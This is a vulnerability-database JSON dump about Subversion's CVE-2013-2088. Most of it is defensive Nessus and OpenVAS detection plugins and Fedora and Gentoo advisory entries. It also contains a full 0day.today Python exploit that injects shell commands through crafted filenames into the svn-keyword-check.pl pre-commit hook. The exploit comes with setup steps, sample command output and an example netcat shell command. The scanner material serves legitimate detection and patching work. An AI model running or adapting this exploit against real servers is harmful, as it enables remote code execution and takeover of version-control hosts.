Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=970014\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=970027\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=970037\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=986194\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-August/113943.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fb0cfdf6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected subversion package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:subversion\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/08/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = 
get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"subversion-1.7.11-1.fc18.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"subversion\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-07T10:54:45", "description": "The remote host is affected by the vulnerability described in GLSA-201309-11\n(Subversion: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Subversion. Please\n review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could cause a Denial of Service condition or obtain\n sensitive information. 
A local attacker could escalate his privileges to\n the user running svnserve.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 21, "published": "2013-09-24T00:00:00", "title": "GLSA-201309-11 : Subversion: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4644", "CVE-2010-4539", "CVE-2011-1783", "CVE-2013-4277", "CVE-2013-1884", "CVE-2011-1752", "CVE-2013-1849", "CVE-2013-1845", "CVE-2013-1846", "CVE-2011-1921", "CVE-2011-0715", "CVE-2013-1847", "CVE-2013-2088", "CVE-2013-4131", "CVE-2013-1968", "CVE-2013-2112"], "modified": "2013-09-24T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:subversion"], "id": "GENTOO_GLSA-201309-11.NASL", "href": "https://www.tenable.com/plugins/nessus/70084", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201309-11.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(70084);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2010-4539\", \"CVE-2010-4644\", \"CVE-2011-0715\", \"CVE-2011-1752\", \"CVE-2011-1783\", \"CVE-2011-1921\", \"CVE-2013-1845\", \"CVE-2013-1846\", \"CVE-2013-1847\", \"CVE-2013-1849\", \"CVE-2013-1884\", \"CVE-2013-1968\", \"CVE-2013-2088\", \"CVE-2013-2112\", \"CVE-2013-4131\", \"CVE-2013-4277\");\n script_bugtraq_id(45655, 46734, 48091, 58323, 58895, 58896, 58897, 58898, 60264, 60265, 60267, 61454, 62266);\n script_xref(name:\"GLSA\", value:\"201309-11\");\n\n script_name(english:\"GLSA-201309-11 : Subversion: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201309-11\n(Subversion: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Subversion. Please\n review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could cause a Denial of Service condition or obtain\n sensitive information. 
A local attacker could escalate his privileges to\n the user running svnserve.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201309-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Subversion users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-vcs/subversion-1.7.13'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:subversion\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-vcs/subversion\", unaffected:make_list(\"ge 
1.7.13\"), vulnerable:make_list(\"lt 1.7.13\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Subversion\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "zdt": [{"lastseen": "2018-04-04T17:32:42", "description": "Exploit for linux platform in category remote exploits", "edition": 2, "published": "2016-10-12T00:00:00", "type": "zdt", "title": "Subversion 1.6.6 / 1.6.12 - Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2088"], "modified": "2016-10-12T00:00:00", "id": "1337DAY-ID-25494", "href": "https://0day.today/exploit/description/25494", "sourceData": "# This is an exploit for the subversion vulnerability published as CVE-2013-2088.\r\n \r\n# Author: GlacierZ0ne ([email\u00a0protected])\r\n# Exploit Type: Code Execution\r\n# Access Type: Authenticated Remote Exploit\r\n# Prerequisites: svn command line client available,\r\n# subversion server exposes webdav through apache,\r\n# user/password with commit privilege\r\n \r\n# The exploit has been tested with the following software:\r\n \r\n# * subversion 1.6.6 server on Ubuntu 10.06 server 64-bit\r\n# * subversion 1.6.12 (r955767) on Ubuntu 11.10 server 32-bit\r\n# * subversion client version 1.8.8 (r1568071) on Ubuntu 14.04 64-bit\r\n \r\n# The following conditions need to be met in order for this to work:\r\n \r\n# The pre-commit script svn-keyword-check.pl needs to be configured as\r\n# pre-commit hook. The version shipped with the subversion 1.6.6 contains\r\n# a bug which prevents it from being used at all. 
This bug must be fixed\r\n# (otherwise neither the exploit, nor the intented purpose of the script\r\n# will work)\r\n# This perl script can be downloaded from the archive source distribution\r\n# at http://archive.apache.org/dist/subversion/. Scripts before 1.6.23\r\n# are vulnerable.\r\n \r\n# ###############################################################\r\n \r\n# 1. configure the pre-commit hook to use svn-keyword-check.pl\r\n \r\n# ###############################################################\r\n# Copy the svn-keyword-check.pl from the source distribution to the\r\n# /svn/repos/<your repository>/hooks directory. Rename pre-commit.tmpl\r\n# to pre-commit. Make sure both files are owned by the user running\r\n# apache (e.g. www-data) and have the executable flag set:\r\n#\r\n# [email\u00a0protected]:/$ cd /svn/repositories/testrepo/hooks\r\n# [email\u00a0protected]:/svn/repos/testrepo/hooks$ sudo mv pre-commit.tmpl pre-commit\r\n# [email\u00a0protected]:/svn/repos/testrepo/hooks$ sudo chmod +x pre-commit\r\n# [email\u00a0protected]:/svn/repos/testrepo/hooks$ ls -al\r\n# total 76\r\n# drwxr-xr-x 2 www-data www-data 4096 2016-09-30 13:35 .\r\n# drwxr-xr-x 7 www-data www-data 4096 2016-09-05 16:28 ..\r\n# -rw-r--r-- 1 www-data www-data 2000 2016-09-05 15:23 post-commit.tmpl\r\n# -rw-r--r-- 1 www-data www-data 1663 2016-09-05 15:23 post-lock.tmpl\r\n# -rw-r--r-- 1 www-data www-data 2322 2016-09-05 15:23 post-revprop-change.tmpl\r\n# -rw-r--r-- 1 www-data www-data 1592 2016-09-05 15:23 post-unlock.tmpl\r\n# -rwxr-xr-x 1 www-data www-data 604 2016-09-30 13:32 pre-commit\r\n# -rw-r--r-- 1 www-data www-data 609 2016-09-05 19:10 pre-commit.tmpl\r\n# -rw-r--r-- 1 www-data www-data 2410 2016-09-05 15:23 pre-lock.tmpl\r\n# -rw-r--r-- 1 www-data www-data 2796 2016-09-05 15:23 pre-revprop-change.tmpl\r\n# -rw-r--r-- 1 www-data www-data 2100 2016-09-05 15:23 pre-unlock.tmpl\r\n# -rw-r--r-- 1 www-data www-data 2830 2016-09-05 15:23 start-commit.tmpl\r\n# -rwxr-xr-x 1 
www-data www-data 8340 2016-09-30 13:35 svn-keyword-check.pl\r\n# [email\u00a0protected]:/svn/repos/testrepo/hooks$ \r\n \r\n# According to the subversion documentation, svn-keyword-check.pl needs\r\n# to be called by pre-commit. svn-keyword-check.pl will return 1 if it\r\n# detects something that should prevent the commit. In that case, the\r\n# subversion server will cancel the commit. Here's how pre-commit looked\r\n# on my test server:\r\n \r\n# [email\u00a0protected]:/svn/repos/testrepo/hooks$ cat pre-commit\r\n# #!/bin/sh\r\n \r\n# REPOS=\"$1\"\r\n# TXN=\"$2\"\r\n \r\n# # Make sure that the log message contains some text.\r\n# #jSVNLOOK=/usr/bin/svnlook\r\n# $SVNLOOK log -t \"$TXN\" \"$REPOS\" | \\\r\n# ep \"[a-zA-Z0-9]\" > /dev/null || exit 1\r\n# \r\n# # Exit on all errors.\r\n# set -e\r\n# \r\n# # Check the files that are are listed in \"svnlook changed\" (except deleted\r\n# # files) for possible problems with svn:keywords set on binary files.\r\n# \"$REPOS\"/hooks/svn-keyword-check.pl --repos $REPOS --transaction $TXN\r\n# #\r\n# #\r\n# #\r\n# \r\n# # All checks passed, so allow the commit.\r\n# exit 0\r\n# \r\n# ###############################################################\r\n# \r\n# 2. fix the bug in svn-keyword-check.pl\r\n# \r\n# ###############################################################\r\n# The script pre-commit will pass on repository and transaction to\r\n# the script svn-keyword-check.pl. Alternatively, it also accepts\r\n# repository and revision. However, specifying both transaction\r\n# and revision is illegal, only one of them is considered legal.\r\n# This reflects in the input parameter plausibility check\r\n# performed in line 89:\r\n# \r\n# if (defined($transaction) and !defined($revision)) {\r\n# croak \"Can't define both revision and transaction!\\n\";\r\n# }\r\n# \r\n# Unfortunately, there is an exclamation mark too much. 
It must\r\n# be\r\n# \r\n# if (defined($transaction) and defined($revision)) {\r\n# croak \"Can't define both revision and transaction!\\n\";\r\n# }\r\n# \r\n# The way this script is shipped in the 1.6.6 source distribution\r\n# no commit is possible at all.\r\n# \r\n# Before using the exploit you should first commit one file\r\n# manually so that the svn client can store your user/password\r\n# locally.\r\n# \r\n# Then, open a shell and navigate to the directory of your project\r\n# and start python cve-2013-2088-1.py <command>:\r\n#\r\n# [email\u00a0protected]:~/eworkspace/kais_1_project$ python svn_exploit2.py ifconfig\r\n# [+] Randfilename is mJHeSkya\r\n# [+] Created random file\r\n# [+] Submitted random file to version control\r\n# [+] Created fake file for cmd execution\r\n# [+] Exploit seems to work: \r\n#\r\n# eth0 Link encap:Ethernet HWaddr 00:0c:29:08:a3:1a \r\n# inet addr:192.168.26.136 Bcast:192.168.26.255 Mask:255.255.255.0\r\n# inet6 addr: fe80::20c:29ff:fe08:a31a/64 Scope:Link\r\n# UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1\r\n# RX packets:1060 errors:0 dropped:0 overruns:0 frame:0\r\n# TX packets:806 errors:0 dropped:0 overruns:0 carrier:0\r\n# collisions:0 txqueuelen:1000 \r\n# RX bytes:172042 (172.0 KB) TX bytes:136684 (136.6 KB)\r\n#\r\n# lo Link encap:Local Loopback \r\n# inet addr:127.0.0.1 Mask:255.0.0.0\r\n# inet6 addr: ::1/128 Scope:Host\r\n# UP LOOPBACK RUNNING MTU:16436 Metric:1\r\n# RX packets:0 errors:0 dropped:0 overruns:0 frame:0\r\n# TX packets:0 errors:0 dropped:0 overruns:0 carrier:0\r\n# collisions:0 txqueuelen:0 \r\n# RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)\r\n#\r\n# [email\u00a0protected]:~/eworkspace/kais_1_project$ python svn_exploit2.py id\r\n# [+] Randfilename is WmolHiuv\r\n# [+] Created random file\r\n# [+] Submitted random file to version control\r\n# [+] Created fake file for cmd execution\r\n# [+] Exploit seems to work: \r\n#\r\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n#\r\n#\r\n# Important things 
to notice\r\n \r\n# * For each command execution the exploit will put a file under\r\n# version control. If you submit a lot of commands you will\r\n# create a lot of files with random 8 alphanumeric character\r\n# file names in your repository.\r\n# * Your command must not contain a / since file names must not\r\n# contain a /. In the author's test environment the current\r\n# working directory of apache was the root folder /.\r\n# Therefore, the exploit will replace / in the command with\r\n# $(pwd). This worked fine for the author.\r\n# In your environment this might be different. As first thing\r\n# execute $(pwd) in order to check if this works for you, too.\r\n# * The command execution assumes that your command prints something\r\n# to the terminal and exits. If you know your command will not\r\n# immediately terminate (e.g. because you're starting a reverse/\r\n# bind shell), provide the -d or --dont-terminate flag:\r\n# python svn_exploit2.py -d \"/bin/bash 0</tmp/mypipe | nc -l 192.168.1.100 4444 1> /tmp/mypipe\"\r\n#\r\n#\r\n#\r\nimport sys\r\nimport subprocess\r\nimport argparse\r\nimport random\r\nimport os\r\n \r\nif __name__ == \"__main__\":\r\n \r\n lowerupper = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\n slash_replacement = \"$(pwd)\" \r\n cwd = os.getcwd()\r\n \r\n parser = argparse.ArgumentParser (usage=\"python {} [options] command\".format (sys.argv [0]),\r\n epilog=\"\\x0a\\x0a\")\r\n \r\n parser.add_argument (dest=\"command\", help=\"Command to execute\")\r\n parser.add_argument (\"-d\", \"--dont-terminate\", help=\"don't force output be sent back to the client. 
Useful for reverse shell connections.\",\r\n action=\"store_true\")\r\n \r\n #\r\n # args handling\r\n #\r\n if (len(sys.argv) <= 1):\r\n parser.print_help ()\r\n sys.exit (0)\r\n \r\n args = parser.parse_args ()\r\n if not args.command:\r\n parser.print_help ()\r\n sys.exit (0)\r\n \r\n #\r\n # / cannot be used in the command because svn will interpret it as\r\n # file separator. Therefore you have to use a workaround. Here,\r\n # $(pwd) works great for us.\r\n #\r\n command = args.command\r\n if command.find (\"/\") != -1:\r\n command = command.replace(\"/\", slash_replacement)\r\n \r\n #\r\n # prepare output files for stdout, stderr\r\n #\r\n sout = open (\"stdout\", \"w+\")\r\n serr = open (\"stderr\", \"w+\")\r\n \r\n randfilename = \"\"\r\n for idx in range (0, 8):\r\n randfilename = randfilename + lowerupper [random.randint (0,51)]\r\n \r\n print (\"[+] Randfilename is {}\".format(randfilename))\r\n \r\n f = open (randfilename, \"w+\")\r\n f.write (\"You've been pwned by GlacierZ0ne'\") # write 4\r\n f.flush ()\r\n f.close ()\r\n \r\n p = subprocess.Popen ([\"svn\", \"add\", \"./{randfilename}\".format (randfilename=randfilename)],\r\n stdout=subprocess.PIPE, stderr=subprocess.PIPE) \r\n c = p.communicate ()\r\n sout.write (c[0])\r\n if len(c[1]) > 0:\r\n print (\"[-] Create random file failed:\")\r\n print (c[1])\r\n sys.exit (0)\r\n print (\"[+] Created random file\")\r\n \r\n p = subprocess.Popen ([\"svn\", \"commit\", \"-m\", \"I pwned you\", \"./{randfilename}\".format (randfilename=randfilename)],\r\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n c = p.communicate ()\r\n sout.write (c[0])\r\n if len(c[1]) > 0:\r\n print (\"[-] Submission of random file failed:\")\r\n print (c[1])\r\n sys.exit (0)\r\n print (\"[+] Submitted random file to version control\")\r\n \r\n fakefilename = None\r\n if args.dont_terminate == True:\r\n fakefilename = \"{}; {}\".format (randfilename, command)\r\n else:\r\n fakefilename = \"{}; {} 1>&2; exit 1\".format 
(randfilename, command)\r\n f = open (fakefilename, \"w+\")\r\n f.write (\"You've been pwned by GlacierZ0ne\") # write 4\r\n f.flush ()\r\n f.close ()\r\n \r\n p = subprocess.Popen ([\"svn\", \"add\", \"{fakefilename}\"\r\n .format (cwd=cwd, fakefilename=fakefilename)],\r\n stdout=subprocess.PIPE, stderr=subprocess.PIPE) \r\n c = p.communicate ()\r\n sout.write (c[0])\r\n if len(c[1]) > 0:\r\n print (\"[-] Creation of fake file failed:\")\r\n print (c[1])\r\n sys.exit (0)\r\n print (\"[+] Created fake file for cmd execution\")\r\n \r\n p = subprocess.Popen ([\"svn\", \"commit\", \"-m\", \"I pwned you\", \"{fakefilename}\"\r\n .format (cwd=cwd, fakefilename=fakefilename)],\r\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n c = p.communicate ()\r\n sout.write (c[0])\r\n if len(c[1]) == 0:\r\n if not args.dont_terminate:\r\n print \"[-] Something went wrong, pre-commit hook didn't kick in.\"\r\n else:\r\n print \"[!] Done\"\r\n sys.exit (0)\r\n else:\r\n idx0= c[1].find (\"Commit blocked by pre-commit hook\")\r\n idx = c[1].find (\"failed with this output\")\r\n \r\n if idx0 != -1 and idx != -1:\r\n print (\"[+] Exploit seems to work: \")\r\n print (c[1][idx + len(\"failed with this output\") + 1:])\r\n \r\n sout.flush ()\r\n sout.close ()\r\n serr.flush ()\r\n serr.close ()\n\n# 0day.today [2018-04-04] #", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25494"}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1968", "CVE-2013-2088", "CVE-2013-2112", "CVE-2013-4131"], "description": "Subversion is a concurrent version control system which enables one or more users to collaborate in developing and maintaining a hierarchy of files and directories while keeping a history of all changes. Subversion only stores the differences between versions, instead of every complete file. 
Subversion is intended to be a compelling replacement for CVS. ", "modified": "2013-08-15T02:33:32", "published": "2013-08-15T02:33:32", "id": "FEDORA:0B49E21353", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: subversion-1.7.11-1.fc18.1", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "openvas": [{"lastseen": "2018-01-26T11:10:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2088", "CVE-2013-4131", "CVE-2013-1968", "CVE-2013-2112"], "description": "Check for the Version of subversion", "modified": "2018-01-26T00:00:00", "published": "2013-08-16T00:00:00", "id": "OPENVAS:866461", "href": "http://plugins.openvas.org/nasl.php?oid=866461", "type": "openvas", "title": "Fedora Update for subversion FEDORA-2013-13672", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for subversion FEDORA-2013-13672\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(866461);\n script_version(\"$Revision: 8542 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-26 07:57:28 +0100 (Fri, 26 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-16 08:59:27 +0530 (Fri, 16 Aug 2013)\");\n script_cve_id(\"CVE-2013-4131\", \"CVE-2013-1968\", \"CVE-2013-2088\", \"CVE-2013-2112\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Fedora Update for subversion FEDORA-2013-13672\");\n\n tag_insight = \"Subversion is a concurrent version control system which enables one\nor more users to collaborate in developing and maintaining a\nhierarchy of files and directories while keeping a history of all\nchanges. Subversion only stores the differences between versions,\ninstead of every complete file. 
Subversion is intended to be a\ncompelling replacement for CVS.\n\";\n\n tag_affected = \"subversion on Fedora 18\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-13672\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-August/113943.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of subversion\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"subversion\", rpm:\"subversion~1.7.11~1.fc18.1\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2088", "CVE-2013-4131", "CVE-2013-1968", "CVE-2013-2112"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-08-16T00:00:00", "id": "OPENVAS:1361412562310866461", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310866461", "type": "openvas", "title": "Fedora Update for subversion FEDORA-2013-13672", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for subversion FEDORA-2013-13672\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.866461\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-16 08:59:27 +0530 (Fri, 16 Aug 2013)\");\n script_cve_id(\"CVE-2013-4131\", \"CVE-2013-1968\", \"CVE-2013-2088\", \"CVE-2013-2112\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Fedora Update for subversion FEDORA-2013-13672\");\n\n\n script_tag(name:\"affected\", value:\"subversion on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-13672\");\n script_xref(name:\"URL\", 
value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-August/113943.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'subversion'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"subversion\", rpm:\"subversion~1.7.11~1.fc18.1\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4644", "CVE-2010-4539", "CVE-2011-1783", "CVE-2013-4277", "CVE-2013-1884", "CVE-2011-1752", "CVE-2013-1849", "CVE-2013-1845", "CVE-2013-1846", "CVE-2011-1921", "CVE-2011-0715", "CVE-2013-1847", "CVE-2013-2088", "CVE-2013-4131", "CVE-2013-1968", "CVE-2013-2112"], "description": "Gentoo Linux Local Security Checks GLSA 201309-11", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121025", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121025", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201309-11", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201309-11.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# 